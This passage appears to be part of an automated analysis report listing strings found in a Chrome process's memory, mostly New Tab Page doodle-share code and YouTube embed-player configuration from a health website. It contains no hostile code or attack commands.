rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#doodle{position:relative}#shareButton{background-color:var(--color-new-tab-page-doodle-share-button-background,none);border:none;height:32px;min-width:32px;padding:0;position:absolute;width:32px;bottom:0}:host-context([dir=ltr]) #shareButton{right:-40px}:host-context([dir=rtl]) #shareButton{left:-40px}#shareButtonIcon{width:18px;height:18px;margin:7px;vertical-align:bottom;mask-image:url(chrome://new-tab-page/icons/share_unfilled.svg);background-color:var(--color-new-tab-page-doodle-share-button-i
                                  Source: chrome.exe, 00000000.00000003.2301954365.000028EC06804000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <!--_html_template_end_-->`}const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends CrLitElement{constructor(){super(...arguments);this.url={url:""}}static get is(){return"ntp-doodle-share-dialog"}static get styles(){return getCss$2()}render(){return getHtml$2.bind(this)()}static get properties(){return{title:{type:String},url:{type:Object}}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.fire("share",channel)}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);let instance$3=null;function getCss$1(){return instance$3||(instance$3=[...[getCss$4()],css`:host{--ntp-logo-height:168px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#doodle{position:relative}#shareButton{background-color:var(--color-new-tab-page-doodle-share-button-background,none);border:none;height:32px;min-width:32px;padding:0;position:absolute;width:32px;bottom:0}:host-context([dir=ltr]) #shareButton{right:-40px}:host-context([dir=rtl]) #shareButton{left:-40px}#shareButtonIcon{width:18px;height:18px;margin:7px;vertical-align:bottom;mask-image:url(chrome://new-tab-page/icons/share_unfilled.svg);background-color:var(--color-new-tab-page-doodle-share-button-i
                                  Source: chrome.exe, 00000000.00000002.2499311995.000028EC0630C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: </div></div></div></div></div><script src=\"/s/player/59b252b9/www-embed-player.vflset/www-embed-player.js\" name=\"embed_client\" id=\"base-js\" nonce=\"NJyqDsAj1TAa8VDP1RD_bg\"></script><script src=\"/s/player/59b252b9/player_ias.vflset/en_US/base.js\" name=\"player/base\" nonce=\"NJyqDsAj1TAa8VDP1RD_bg\"></script><script nonce=\"\">writeEmbed();</script><script nonce=\"\">if (window.ytcsi) {ytcsi.infoGel({serverTimeMs: 43.0 }, '');}</script><noscript><div class=\"player-unavailable\"><h1 class=\"message\">An error occurred.</h1><div class=\"submessage\"><a href=\"https://www.youtube.com/watch?v=h15NcT6UXh0\" target=\"_blank\">Try watching this video on www.youtube.com</a>, or enable JavaScript if it is disabled in your browser.</div></div></noscript></body>","favicon":"","currentUrl":"https://fountainofhealth.ca/en","listArrString":[null,"https://www.youtube.com/watch?v=h15NcT6UXh0","https://www.youtube.com/watch?v=h15NcT6UXh0&embeds_referring_euri=https%3A%2F%2Ffountainofhealth.ca%2F"],"imgArrString":["https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR|data:image/png;base64,AA==","https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR|data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAADGCAYAAAAT+OqFAAAAdklEQVQoz42QQQ7AIAgEF/T/D+kbq/RWAlnQyyazA4aoAB4FsBSA/bFjuF1EOL7VbrIrBuusmrt4ZZORfb6ehbWdnRHEIiITaEUKa5EJqUakRSaEYBJSCY2dEstQY7AuxahwXFrvZmWl2rh4JZ07z9dLtesfNj5q0FU3A5ObbwAAAABJRU5ErkJggg==","https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR|data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIGVuYWJsZS1iYWNrZ3JvdW5kPSJuZXcgMCAwIDI0IDI0IiBoZWlnaHQ9IjI0IiB2aWV3Qm94PSIwIDAgMjQgMjQiIHdpZHRoPSIyNCIgZmlsbD0iI2ZmZiI+PGc+PHBhdGggZD0iTTE2LjI0LDkuMTdMMTMuNDEsMTJsMi44MywyLjgzbC0xLjQxLDEuNDFMMTIsMTMuNDFsLTIuODMsMi44M2wtMS40MS0xLjQxTDEwLjU5LDEyTDcuNzYsOS4xN2wxLjQxLTEuNDFMMTIsMTAuNTkgbDIuODMtMi44M0wxNi4yNCw5LjE3eiBNNC45Myw0LjkzYy0zLjkxLDMuOTEtMy45MSwxMC4yNCwwLDE0LjE0YzMuOTEsMy45MSwxMC4yNCwzLjkxLDE0LjE0LDBjMy45MS0zLjkxLDMuOTEtMTAuMjQsMC0xNC4xNCBDMTUuMTcsMS4wMiw4LjgzLDEuMDIsNC45Myw0LjkzeiBNMTguMzYsNS42NGMzLjUxLDMuNTEsMy41MSw5LjIyLDAsMTIuNzNzLTkuMjIsMy41MS0xMi43Mywwcy0zLjUxLTkuMjIsMC0xMi43MyBDOS4xNSwyLjEzLDE0Ljg1LDIuMTMsMTguMzYsNS42NHoiIC8+PC9nPjwvc3ZnPg==","https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR|data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAADCCAYAAACIaaiTAAAAAXNSR0IArs4c6QAAARJJREFUOE9lyNdHBQAAhfHb3nvvuu2997jNe29TJJEkkkgSSSSJJJJEEkkiifRH5jsP56Xz8PM5gcC/xfCIWBNHiXiTQIlEk0SJZJNCiVRIM+mUyDCZlMgy2ZTIMbmUyDP5lCgwhZQoMsWUKDGllCgz5ZSogEpTRYlqU0OJoKmlRJ2pp0SDaaREk2mmRItppUSbaadEh+mkRBd0mx5K9Jo+SvSbAUoMmiFKDJsRSoyaMUqMmwlKhMwkJabMNCVmYNbMUSJsIpSImnlKLJhFSiyZZWoFVmEN1mEDNmELtmEHdmEP9uEADuEIjuEETuEMzuECLuEKruEGbuEO7uEBHuEJnuEFXuEN3uEDPuELvuEHfv8AoRErEi7Uc8UAAAAASUVORK5CYII="],"notVisible":false,"pdfViewerLoaded":false,"hasInputFields":false} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2343716935.000028EC04BCE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: = [];","currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2323304427.000028EC06AA7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: = [];","currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":true} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2486385269.000028EC03974000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: =https://www.youtube.com/embed/FURi5aHg1g? equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2490012641.000028EC03F0C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2470328399.000028EC025B4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2341068096.000028EC06B20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: =https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2341068096.000028EC06B20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2484247572.000028EC036C8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: =https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX# equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2342010290.000028EC04DF0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2490012641.000028EC03F0C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2470328399.000028EC025B4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: =https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2499056442.000028EC0621C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: =https://www.youtube.com/embed/gobWGqPjSQ? equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2470707336.000028EC02690000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2502877436.000028EC06F59000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2490012641.000028EC03F0C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: =https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2486707803.000028EC03A38000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: =https://www.youtube.com/embed/h15NcT6UXh0?siYrX equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2486707803.000028EC03A38000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2491838575.000028EC04094000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: =https://www.youtube.com/embed/h15NcT6Uh0? equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2377854851.000028EC025DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2370628411.000028EC0391B000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2370719843.000028EC025E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: >6https://www.youtube.com/youtubei/v1/log_event?alt=json equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2437824544.000001E4AB3AD000.00000004.00000001.00040000.00000007.sdmpString found in binary or memory: >6https://www.youtube.com/youtubei/v1/log_event?alt=json( ( equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2439355514.000001E4ACC00000.00000004.00000001.00040000.00000007.sdmpString found in binary or memory: >6https://www.youtube.com/youtubei/v1/log_event?alt=jsonscriptSource equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2474881324.000028EC02C04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: @https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2331272566.000028EC0578B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: B))):this.api.K().D("enable_adb_handling_in_sabr")&&T==="BROWSER_OR_EXTENSION_ERROR"&&!R.X?(R=R.hostLanguage,B="//support.google.com/youtube/answer/3037019#zippy=%2Cupdate-your-browser-and-check-your-extensions",R&&(B=g.Qn(B,{hl:R})),this.oI(HH(this,"BROWSER_OR_EXTENSION_ERROR",B))):this.oI(g.nu(B.errorMessage)):this.oI(HH(this,"HTML5_NO_AVAILABLE_FORMATS_FALLBACK_WITH_LINK_SHORT","//www.youtube.com/supported_browsers")):(B=R.hostLanguage,T="//support.google.com/youtube/?p=player_error1",B&&(T=g.Qn(T, equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2330516367.000028EC067EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: CLgoATEJT-sAUqKENBTVNHQlVULVpxLURKU0NFdmVwMlF2bW9RajU3QVBKM0FVZEJ3PT0%3D","ROOT_VE_TYPE":16623,"CLIENT_PROTOCOL":"h2","CLIENT_TRANSPORT":"tcp","TIME_CREATED_MS":1747926390713,"VALID_SESSION_TEMPDATA_DOMAINS":["youtu.be","youtube.com","www.youtube.com","web-green-qa.youtube.com","web-release-qa.youtube.com","web-integration-qa.youtube.com","m.youtube.com","mweb-green-qa.youtube.com","mweb-release-qa.youtube.com","mweb-integration-qa.youtube.com","studio.youtube.com","studio-green-qa.youtube.com","studio-integration-qa.youtube.com"],"LOTTIE_URL":{"privateDoNotAccessOrElseTrustedResourceUrlWrappedValue":"https://www.youtube.com/s/desktop/fc303b88/jsbin/lottie-light.vflset/lottie-light.js"},"IDENTITY_MEMENTO":{"visitor_data":"CgtZeUJvRVhYZXBCMCj2-rzBBjIKCgJVUxIEGgAgUA%3D%3D"},"PLAYER_VARS":{"embedded_player_response":"{\"responseContext\":{\"serviceTrackingParams\":[{\"service\":\"CSI\",\"params\":[{\"key\":\"c\",\"value\":\"WEB_EMBEDDED_PLAYER\"},{\"key\":\"cver\",\"value\":\"1.20250519.22.00\"},{\"key\":\"yt_li\",\"value\":\"0\"},{\"key\":\"GetEmbeddedPlayer_rid\",\"value\":\"0x4915923d623f029d\"}]},{\"service\":\"GFEEDBACK\",\"params\":[{\"key\":\"logged_in\",\"value\":\"0\"}]},{\"service\":\"GUIDED_HELP\",\"params\":[{\"key\":\"logged_in\",\"value\":\"0\"}]},{\"service\":\"ECATCHER\",\"params\":[{\"key\":\"client.version\",\"value\":\"20250519\"},{\"key\":\"client.name\",\"value\":\"WEB_EMBEDDED_PLAYER\"}]}]},\"embedPreview\":{\"thumbnailPreviewRenderer\":{\"title\":{\"runs\":[{\"text\":\"Welcome to Thrive Learning\"}]},\"defaultThumbnail\":{\"thumbnails\":[{\"url\":\"https://i.ytimg.com/vi_webp/h15NcT6UXh0/default.webp\",\"width\":120,\"height\":90},{\"url\":\"https://i.ytimg.com/vi/h15NcT6UXh0/hqdefault.jpg?sqp\u003d-oaymwEbCKgBEF5IVfKriqkDDggBFQAAiEIYAXABwAEG\\u0026rs\u003dAOn4CLDJWTWlcbwcb-bEqBgHid5A-_nY9A\",\"width\":168,\"height\":94},{\"url\":\"https://i.ytimg.com/vi/h15NcT6UXh0/hqdefault.jpg?sqp\u003d-oaymwEbCMQBEG5IVfKriqkDDggBFQAAiEIYAXABwAEG\\u0026rs\u003dAOn4CLDmal8uNjukQFZ7jFGA9LECrFIsyA\",\"width\":196,\"height\":110},{\"url\":\"https://i.ytimg.com/vi/h15NcT6UXh0/hqdefault.jpg?sqp\u003d-oaymwEcCPYBEIoBSFXyq4qpAw4IARUAAIhCGAFwAcABBg\u003d\u003d\\u0026rs\u003dAOn4CLA21q98DV-DLPdugT0We8xLQbvHXg\",\"width\":246,\"height\":138},{\"url\":\"https://i.ytimg.com/vi_webp/h15NcT6UXh0/mqdefault.webp\",\"width\":320,\"height\":180},{\"url\":\"https://i.ytimg.com/vi/h15NcT6UXh0/hqdefault.jpg?sqp\u003d-oaymwEcCNACELwBSFXyq4qpAw4IARUAAIhCGAFwAcABBg\u003d\u003d\\u0026rs\u003dAOn4CLDsrkYEId9-bMHMSBZa-AFuWhtIHg\",\"width\":336,\"height\":188},{\"url\":\"https://i.ytimg.com/vi_webp/h15NcT6UXh0/hqdefault.webp\",\"width\":480,\"height\":360},{\"url\":\"https://i.ytimg.com/vi_webp/h15NcT6UXh0/sddefault.webp\",\"width\":640,\"height\":480},{\"url\":\"https://i.ytimg.com/vi_webp/h15NcT6UXh0/maxresdefault.webp\",\"width\":1920,\"height\":1080}]},\"playButton\":{\"buttonRenderer\":{\"style\":\"STYLE_DEFAULT\",\"size\":\"SIZE_DEFAULT\",\"isDisabled\":false,\"n
                                  Source: chrome.exe, 00000000.00000003.2371291317.000028EC0800B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: CgtZeUJvRVhYZXBCMCj2-rzBBjIKCgJVUxIEGgAgUA%3D%3D\",\"userAgent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36,gzip(gfe)\",\"clientName\":\"WEB_EMBEDDED_PLAYER\",\"clientVersion\":\"1.20250519.22.00\",\"osName\":\"Windows\",\"osVersion\":\"10.0\",\"originalUrl\":\"https://www.youtube.com/embed/gobWGqPjLSQ?si\\u003dE-htCYBt9m3YW0ws\",\"platform\":\"DESKTOP\",\"clientFormFactor\":\"UNKNOWN_FORM_FACTOR\",\"configInfo\":{\"appInstallData\":\"CPb6vMEGELnZzhwQ7aDPHBC9mbAFEN68zhwQ66DPHBDmoM8cEIiHsAUQpp3PHBCJsM4cEOvo_hIQr4__EhDk5_8SENyizxwQ9quwBRDdls8cEJmYsQUQ37jOHBDxnLAFEP2czxwQvoqwBRCHrM4cEIjjrwUQ4Z7PHBD-ns8cEODg_xIQiIS4IhCThs8cEIHNzhwQ2oeAExCa9M4cEJybzxwQmY2xBRCe0LAFEPyyzhwQvbauBRCLgoATEMzfrgUQ0-GvBRD-8_8SELvZzhwQyeawBRDqo88cEMyJzxwQt-r-EhCwic8cEIOEuCIQ9v7_EhCU_rAFENeczxwQuOTOHBDw4s4cEMn3rwUqKENBTVNHQlVULVpxLURKU0NFdmVwMlF2bW9RajU3QVBKM0FVZEJ3PT0%3D\"},\"browserName\":\"Chrome\",\"browserVersion\":\"134.0.0.0\",\"acceptHeader\":\"text/html,application/xhtml+xml,application/xml;q\\u003d0.9,image/avif,image/webp,image/apng,*/*;q\\u003d0.8,application/signed-exchange;v\\u003db3;q\\u003d0.7\",\"deviceExperimentId\":\"ChxOelV3TnpJNE5qWTRNakEwTnpNd05UVTVOZz09EPb6vMEGGPb6vMEG\",\"rolloutToken\":\"CLLHipfu3syhbhCrlubnrLeNAxiC1vOcrbeNAw%3D%3D\"},\"user\":{\"lockedSafetyMode\":false},\"request\":{\"useSsl\":true},\"clickTracking\":{\"clickTrackingParams\":\"IhMIx8HznK23jQMV42xMCB1cST25\"},\"thirdParty\":{\"embeddedPlayerContext\":{\"embeddedPlayerEncryptedContext\":\"AD5ZzFRO_8nQGG9ORNDSzmkPn-Uo_VeiVfjiwPlQ8ibCpbKGSMTxwT1uceJbejPXkPtxSS6fZPYoJMw_71fzot0Mx1OJrOf2f68RDWLaooVr3MmGoIQB53hXn4k_0fSZd_Yd\",\"ancestorOriginsSupported\":false}}},\"INNERTUBE_CONTEXT_CLIENT_NAME\":56,\"INNERTUBE_CONTEXT_CLIENT_VERSION\":\"1.20250519.22.00\",\"INNERTUBE_CONTEXT_GL\":\"US\",\"INNERTUBE_CONTEXT_HL\":\"en\",\"LATEST_ECATCHER_SERVICE_TRACKING_PARAMS\":{\"client.name\":\"WEB_EMBEDDED_PLAYER\"},\"LOGGED_IN\":false,\"PAGE_BUILD_LABEL\":\"youtube.player.web_20250519_22_RC00\",\"PAGE_CL\":760609635,\"SERVER_NAME\":\"WebFE\",\"VISITOR_DATA\":\"CgtZeUJvRVhYZXBCMCj2-rzBBjIKCgJVUxIEGgAgUA%3D%3D\",\"WEB_PLAYER_CONTEXT_CONFIGS\":{\"WEB_PLAYER_CONTEXT_CONFIG_ID_EMBEDDED_PLAYER\":{\"rootElementId\":\"movie_player\",\"jsUrl\":\"/s/player/59b252b9/player_ias.vflset/en_US/base.js\",\"cssUrl\":\"/s/player/59b252b9/www-player.css\",\"contextId\":\"WEB_PLAYER_CONTEXT_CONFIG_ID_EMBEDDED_PLAYER\",\"eventLabel\":\"embedded\",\"contentRegion\":\"US\",\"hl\":\"en_US\",\"hostLanguage\":\"en\",\"innertubeApiKey\":\"AIzaSyAO_FJ2SlqU8Q4STEHLGCilw_Y9_11qcW8\",\"innertubeApiVersion\":\"v1\",\"innertubeContextClientVersion\":\"1.20250519.22.00\",\"device\":{\"brand\":\"\",\"model\":\"\",\"browser\":\"Chrome\",\"browserVersion\":\"134.0.0.0\",\"os\":\"Windows\",\"osVersion\":\"10.0\",\"platform\":\"DESKTOP\",\"interfaceName\":\"WEB_EMBEDDED_PLAYER\",\"interfaceVersion\":\"1.20250519.22.00\"},\"serializedExperimentIds\":\"24004644,24439361,24
                                  Source: chrome.exe, 00000000.00000002.2508320989.000028EC07F03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: CgtZeUJvRVhYZXBCMCj2-rzBBjIKCgJVUxIEGgAgUA%3D%3D\",\"userAgent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36,gzip(gfe)\",\"clientName\":\"WEB_EMBEDDED_PLAYER\",\"clientVersion\":\"1.20250519.22.00\",\"osName\":\"Windows\",\"osVersion\":\"10.0\",\"originalUrl\":\"https://www.youtube.com/embed/h15NcT6UXh0?si\\u003dYrXkudamh5IoggTR\",\"platform\":\"DESKTOP\",\"clientFormFactor\":\"UNKNOWN_FORM_FACTOR\",\"configInfo\":{\"appInstallData\":\"CPb6vMEGEODg_xIQgc3OHBCIhLgiEIeszhwQ2oeAExDM364FEOugzxwQvoqwBRCvj_8SEN68zhwQ3ZbPHBD8ss4cEP7z_xIQpp3PHBDT4a8FEIjjrwUQ3KLPHBDhns8cEP2czxwQ5qDPHBDMic8cEL2ZsAUQ37jOHBC52c4cEParsAUQvbauBRCZjbEFEO2gzxwQ8OLOHBDJ968FEOvo_hIQmZixBRCcm88cEPGcsAUQyeawBRC72c4cEJr0zhwQsInPHBDXnM8cEOqjzxwQuOTOHBCe0LAFEIOEuCIQ9v7_EhCJsM4cEP6ezxwQk4bPHBDk5_8SELfq_hIQiIewBRCLgoATEJT-sAUqKENBTVNHQlVULVpxLURKU0NFdmVwMlF2bW9RajU3QVBKM0FVZEJ3PT0%3D\"},\"browserName\":\"Chrome\",\"browserVersion\":\"134.0.0.0\",\"acceptHeader\":\"text/html,application/xhtml+xml,application/xml;q\\u003d0.9,image/avif,image/webp,image/apng,*/*;q\\u003d0.8,application/signed-exchange;v\\u003db3;q\\u003d0.7\",\"deviceExperimentId\":\"ChxOelV3TnpJNE5qWTRNVFF6TkRNMk9ESTVOUT09EPb6vMEGGPb6vMEG\",\"rolloutToken\":\"CLLHipfu3syhbhCrlubnrLeNAxi57PGcrbeNAw%3D%3D\"},\"user\":{\"lockedSafetyMode\":false},\"request\":{\"useSsl\":true},\"clickTracking\":{\"clickTrackingParams\":\"IhMI9d/xnK23jQMVIU5MCB1T1y6N\"},\"thirdParty\":{\"embeddedPlayerContext\":{\"embeddedPlayerEncryptedContext\":\"AD5ZzFTPLYxSer_R5PwkmZS-Tw4kib1_UG_YuM7PzprIn7h7HloFiT40fhwHmvTcbDZ5mAmX_gi3mQS0IvX9cIfuaL02Wqj7eTV8PMLoUpzaX-xPKwhnTeP7PCHG7qXu9THt\",\"ancestorOriginsSupported\":false}}},\"INNERTUBE_CONTEXT_CLIENT_NAME\":56,\"INNERTUBE_CONTEXT_CLIENT_VERSION\":\"1.20250519.22.00\",\"INNERTUBE_CONTEXT_GL\":\"US\",\"INNERTUBE_CONTEXT_HL\":\"en\",\"LATEST_ECATCHER_SERVICE_TRACKING_PARAMS\":{\"client.name\":\"WEB_EMBEDDED_PLAYER\"},\"LOGGED_IN\":false,\"PAGE_BUILD_LABEL\":\"youtube.player.web_20250519_22_RC00\",\"PAGE_CL\":760609635,\"SERVER_NAME\":\"WebFE\",\"VISITOR_DATA\":\"CgtZeUJvRVhYZXBCMCj2-rzBBjIKCgJVUxIEGgAgUA%3D%3D\",\"WEB_PLAYER_CONTEXT_CONFIGS\":{\"WEB_PLAYER_CONTEXT_CONFIG_ID_EMBEDDED_PLAYER\":{\"rootElementId\":\"movie_player\",\"jsUrl\":\"/s/player/59b252b9/player_ias.vflset/en_US/base.js\",\"cssUrl\":\"/s/player/59b252b9/www-player.css\",\"contextId\":\"WEB_PLAYER_CONTEXT_CONFIG_ID_EMBEDDED_PLAYER\",\"eventLabel\":\"embedded\",\"contentRegion\":\"US\",\"hl\":\"en_US\",\"hostLanguage\":\"en\",\"innertubeApiKey\":\"AIzaSyAO_FJ2SlqU8Q4STEHLGCilw_Y9_11qcW8\",\"innertubeApiVersion\":\"v1\",\"innertubeContextClientVersion\":\"1.20250519.22.00\",\"device\":{\"brand\":\"\",\"model\":\"\",\"browser\":\"Chrome\",\"browserVersion\":\"134.0.0.0\",\"os\":\"Windows\",\"osVersion\":\"10.0\",\"platform\":\"DESKTOP\",\"interfaceName\":\"WEB_EMBEDDED_PLAYER\",\"interfaceVersion\":\"1.20250519.22.00\"},\"serializedExperimentIds\":\"24004644,24439361,24
                                  Source: chrome.exe, 00000000.00000002.2487618019.000028EC03BAC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: DM?www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0wsl equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2321018206.000028EC04C90000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Data_ = [];","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":true} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2334224640.000028EC067EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Dw4s4cEMn3rwUqKENBTVNHQlVULVpxLURKU0NFdmVwMlF2bW9RajU3QVBKM0FVZEJ3PT0%3D","ROOT_VE_TYPE":16623,"CLIENT_PROTOCOL":"h2","CLIENT_TRANSPORT":"tcp","TIME_CREATED_MS":1747926390752,"VALID_SESSION_TEMPDATA_DOMAINS":["youtu.be","youtube.com","www.youtube.com","web-green-qa.youtube.com","web-release-qa.youtube.com","web-integration-qa.youtube.com","m.youtube.com","mweb-green-qa.youtube.com","mweb-release-qa.youtube.com","mweb-integration-qa.youtube.com","studio.youtube.com","studio-green-qa.youtube.com","studio-integration-qa.youtube.com"],"LOTTIE_URL":{"privateDoNotAccessOrElseTrustedResourceUrlWrappedValue":"https://www.youtube.com/s/desktop/fc303b88/jsbin/lottie-light.vflset/lottie-light.js"},"IDENTITY_MEMENTO":{"visitor_data":"CgtZeUJvRVhYZXBCMCj2-rzBBjIKCgJVUxIEGgAgUA%3D%3D"},"PLAYER_VARS":{"embedded_player_response":"{\"responseContext\":{\"serviceTrackingParams\":[{\"service\":\"CSI\",\"params\":[{\"key\":\"c\",\"value\":\"WEB_EMBEDDED_PLAYER\"},{\"key\":\"cver\",\"value\":\"1.20250519.22.00\"},{\"key\":\"yt_li\",\"value\":\"0\"},{\"key\":\"GetEmbeddedPlayer_rid\",\"value\":\"0xecabdd26d7a3e0d8\"}]},{\"service\":\"GFEEDBACK\",\"params\":[{\"key\":\"logged_in\",\"value\":\"0\"}]},{\"service\":\"GUIDED_HELP\",\"params\":[{\"key\":\"logged_in\",\"value\":\"0\"}]},{\"service\":\"ECATCHER\",\"params\":[{\"key\":\"client.version\",\"value\":\"20250519\"},{\"key\":\"client.name\",\"value\":\"WEB_EMBEDDED_PLAYER\"}]}]},\"embedPreview\":{\"thumbnailPreviewRenderer\":{\"title\":{\"runs\":[{\"text\":\"Science of THRIVE Approach\"}]},\"defaultThumbnail\":{\"thumbnails\":[{\"url\":\"https://i.ytimg.com/vi_webp/gobWGqPjLSQ/default.webp\",\"width\":120,\"height\":90},{\"url\":\"https://i.ytimg.com/vi/gobWGqPjLSQ/hqdefault.jpg?sqp\u003d-oaymwEbCKgBEF5IVfKriqkDDggBFQAAiEIYAXABwAEG\\u0026rs\u003dAOn4CLBWcAvV-oZl8DrOaiFDGLelfGE3nw\",\"width\":168,\"height\":94},{\"url\":\"https://i.ytimg.com/vi/gobWGqPjLSQ/hqdefault.jpg?sqp\u003d-oaymwEbCMQBEG5IVfKriqkDDggBFQAAiEIYAXABwAEG\\u0026rs\u003dAOn4CLBnosSpiH6IEk8c4gUPSJnKCwA5Mg\",\"width\":196,\"height\":110},{\"url\":\"https://i.ytimg.com/vi/gobWGqPjLSQ/hqdefault.jpg?sqp\u003d-oaymwEcCPYBEIoBSFXyq4qpAw4IARUAAIhCGAFwAcABBg\u003d\u003d\\u0026rs\u003dAOn4CLDKjW3iUxtvM1O0A9dJSBlCgChwPw\",\"width\":246,\"height\":138},{\"url\":\"https://i.ytimg.com/vi_webp/gobWGqPjLSQ/mqdefault.webp